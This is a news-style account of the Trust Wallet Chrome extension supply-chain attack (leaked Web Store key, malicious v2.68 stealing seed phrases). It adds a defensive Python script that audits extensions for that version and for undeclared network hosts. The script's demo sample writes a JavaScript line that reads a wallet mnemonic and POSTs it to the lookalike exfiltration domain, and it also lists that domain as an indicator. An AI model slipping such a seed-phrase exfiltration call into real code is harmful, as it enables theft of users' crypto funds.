Trust Wallet’s Chrome extension was compromised in a supply-chain attack that drained approximately $7 million from user wallets between December 24 and 26. The breach, confirmed by Trust Wallet and by Binance founder Changpeng Zhao (CZ), used a leaked Chrome Web Store API key to push a malicious update (v2.68) to roughly 3,000 users.
The Mechanism: Leaked API Keys
The attack vector was not a smart-contract flaw or a phishing link but the update pipeline itself. According to Trust Wallet CEO Eowyn Chen, the attackers used a leaked Chrome Web Store API key to publish version 2.68 directly to the Chrome Web Store, bypassing the company’s internal review process. Whoever holds a store publishing credential can ship a build that Chrome then installs on every user’s machine as a routine, legitimate-looking update.
Once installed, the compromised extension ran a script that harvested users’ mnemonic seed phrases and sent them to an attacker-controlled domain, api.metrics-trustwallet.com (a lookalike of the legitimate trustwallet.com, not a subdomain of it). The malicious code targeted high-value holdings on the Bitcoin, Ethereum, and Solana chains. Trust Wallet has since shipped a clean build, version 2.69, and revoked the compromised API credentials. Updating removes the malicious code, but it does not undo the exposure: a seed phrase that has already been exfiltrated stays compromised, so affected users need a wallet generated from a fresh seed rather than just a newer extension.
The malicious extension v2.68 was NOT released through our internal manual process. Our findings suggest it was published externally through a leaked Chrome Web Store API key.
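The two signals this incident leaves behind for anyone auditing an installed build are the manifest version (2.68 malicious, 2.69 clean) and network destinations hard-coded into the extension’s scripts that the manifest never declared. The script below is an added example, not Trust Wallet’s code or anything from the incident investigation: it unpacks nothing real, but builds a constructed sample extension in a temp directory (manifest plus one JS file with a stand-in exfiltration call) and then audits it. The manifest fields it reads (`version`, `host_permissions`) and the `<all_urls>` / `*.example.com` match-pattern forms are standard Chrome extension syntax; the sample JS, the `wallet.exportMnemonic()` call and the `/collect` path are assumptions for the demo.

```python
"""
Audit an unpacked Chrome extension directory for (1) a known-malicious
manifest version and (2) hosts referenced in JS that are either a known
exfiltration domain or not declared in the manifest's host_permissions.
Added example; constructed sample data, not the real malicious payload.
"""
from __future__ import annotations

import json
import re
import tempfile
from pathlib import Path

# Indicators taken from the incident write-up above.
MALICIOUS_VERSIONS = {"2.68"}
KNOWN_EXFIL_DOMAINS = {"api.metrics-trustwallet.com"}

# Captures the host of any http(s) URL literal in JS source.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")


def host_from_pattern(pattern: str) -> str | None:
    """Reduce a match pattern ('https://*.example.com/*', '<all_urls>') to its host part."""
    if pattern == "<all_urls>":
        return "*"
    m = re.match(r"^[a-z*]+://([^/]+)/", pattern)
    return m.group(1) if m else None


def host_allowed(host: str, declared: set[str]) -> bool:
    """True if host is covered by a declared host pattern.

    '*.trustwallet.com' covers 'api.trustwallet.com' but NOT the lookalike
    'api.metrics-trustwallet.com', which is a different registrable domain.
    """
    for d in declared:
        if d == "*" or d == host:
            return True
        if d.startswith("*.") and host.endswith(d[1:]):
            return True
    return False


def audit_extension(ext_dir: Path) -> dict:
    """Return manifest identity, hosts seen in JS, and a list of findings."""
    manifest = json.loads((ext_dir / "manifest.json").read_text())
    declared = {h for p in manifest.get("host_permissions", []) if (h := host_from_pattern(p))}
    findings: list[str] = []

    if manifest.get("version") in MALICIOUS_VERSIONS:
        findings.append(f"version {manifest['version']} is a known malicious build")

    referenced: dict[str, set[str]] = {}
    for js in ext_dir.rglob("*.js"):
        for m in URL_RE.finditer(js.read_text(errors="ignore")):
            referenced.setdefault(m.group(1), set()).add(js.relative_to(ext_dir).as_posix())

    for host, files in sorted(referenced.items()):
        if host in KNOWN_EXFIL_DOMAINS:
            findings.append(f"known exfiltration domain {host} in {sorted(files)}")
        elif not host_allowed(host, declared):
            findings.append(f"undeclared network destination {host} in {sorted(files)}")

    return {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "declared_hosts": declared,
        "referenced_hosts": set(referenced),
        "findings": findings,
    }


def build_sample(version: str, with_exfil: bool) -> Path:
    """Write a constructed sample extension to a temp dir and return its path (demo data, not real code)."""
    ext_dir = Path(tempfile.mkdtemp(prefix="ext-audit-"))
    manifest = {
        "manifest_version": 3,
        "name": "Trust Wallet",
        "version": version,
        "host_permissions": ["https://*.trustwallet.com/*"],
    }
    (ext_dir / "manifest.json").write_text(json.dumps(manifest))
    js = 'fetch("https://api.trustwallet.com/v1/prices");\n'  # legitimate, declared host
    if with_exfil:  # stand-in for the seed-phrase harvester; hypothetical API names
        js += (
            "const m = await wallet.exportMnemonic();\n"
            'fetch("https://api.metrics-trustwallet.com/collect", '
            '{method: "POST", body: JSON.stringify({m})});\n'
        )
    (ext_dir / "background.js").write_text(js)
    return ext_dir


if __name__ == "__main__":
    for ver, bad in (("2.68", True), ("2.69", False)):
        report = audit_extension(build_sample(ver, bad))
        print(f"{report['name']} {report['version']}: {report['findings'] or 'clean'}")
```

Run against a real unpacked build (Chrome keeps them under the profile’s `Extensions/<id>/<version>/` directory), the point is the second check as much as the first: a version number can be rebuilt, but a hard-coded host that the manifest never asked permission for, especially one that looks like the vendor’s domain without being under it, is the kind of thing a release review should refuse to ship.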
Supply Chain Vulnerability
This incident appears to be a downstream effect of the larger “Shai-Hulud” supply-chain attack from November, which exposed developer GitHub secrets across the industry. Security firms noted that the attackers waited nearly a month before using the stolen credentials to launch the Christmas Eve attack, a reminder that a secret exposed in one compromise stays usable until it is rotated, however quiet the weeks after the leak look.
Market Reaction & Reimbursement
Despite the severity of the breach, Trust Wallet Token (TWT) held up, trading at $0.93 (down 0.7%) as the market absorbed the news. The muted price action likely reflects CZ’s rapid intervention: the Binance founder confirmed on X (formerly Twitter) that Trust Wallet would cover the full $7 million loss, stating, “User funds are SAFU.”
The company is finalizing a claims process for the roughly 2,500 affected wallet addresses.